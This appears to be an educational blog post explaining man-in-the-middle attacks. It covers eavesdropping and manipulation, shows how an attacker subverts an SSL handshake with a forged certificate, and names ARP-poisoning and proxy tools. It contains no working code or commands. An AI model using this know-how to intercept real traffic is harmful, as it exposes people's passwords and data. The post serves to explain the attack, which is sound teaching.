MiTM is an eavesdropping attack carried about by establishing a relay or proxy into a communication session. It may exploit in real-time or after the fat the info obtained from the interception. Legitimate users will not be aware of this attack or their connection has been compromised. This attack supports both HTTP and HTTPS connections.
By means of this attack, an attacker can:
i. Run Denial of service (DoS) attacks
ii. intercept data
iii. Collect passwords
iv. Manipulate data
v. Tap VoIP phone calls
Two Types of MiTM:
Eavesdropping
- Happens when an attacker receives a data communication stream.
-Not using security mechanisms such as IPsec, SSH or SSL makes data vulnerable to an unauthorized user
2. Manipulation
- An extended step of eavesdropping
-Can be done by ARP poisoning
How do attackers defeat Secured Communication?
The client has established a connection with the server. The client starts by requesting an SSL session by sending unencrypted client messages which specify the options that it is able to use to set up the secure connection. These include things like the version of SSL and acceptable crypto-algorithm. The server responds with unencrypted messages and confirms the specific options to be used for the encryption on the connection. The server also sends the certificates which include its public key and a server message done to close the server’s part of the setup. The client sends a client key exchange message encrypted with the server’s public key which includes a session key for the encryption. The client also sends an exchange cipher message and sends a finished message.
The server sends an exchange cipher and finished message in response. The connection is set up and the client and server can communicate securely.
Now play of MiTM starts here
The client sends a client “hello” message, but the communication path has been subverted to send that message to an attacker. The attacker takes the message and sends the same client's “hello” to the server. The server thinks this came from a real client, thus responding back with “hello” but is copied by the attacker and transferred to the original recipient. The server sends real certificates to the attacker and the attacker sends a server certificate to the client but with his own public key. This is a fake certificate created by the attacker. Now the client key exchange is carried out between client and attacker while another client key exchange is carried out between attacker and server.
Clear view of MiTM
This creates two different encrypted connections with the attacker in the middle. The client and attacker can now communicate securely with the client thinking it’s talking to the server and again same with attacker and server. The attacker decrypts and re-encrypts, messages going both ways and so sees everything that is being transmitted.
Detecting this attack is extremely difficult because users will not be aware of it. Do not be assured even after detecting it, you will be invulnerable to this attack again.
In order to make this attack successful, the attacker has to direct the client to a proxy server rather than the real server. Some famous ways to establish MiTM attacks are:
Web proxy using webscrab-Ng and zed attack proxy
ARP poisoning using subterfuge
Malicious wifi
we will upload the above-mentioned ways in a practical way. For never missing updates please stay tuned with us.
Σχόλια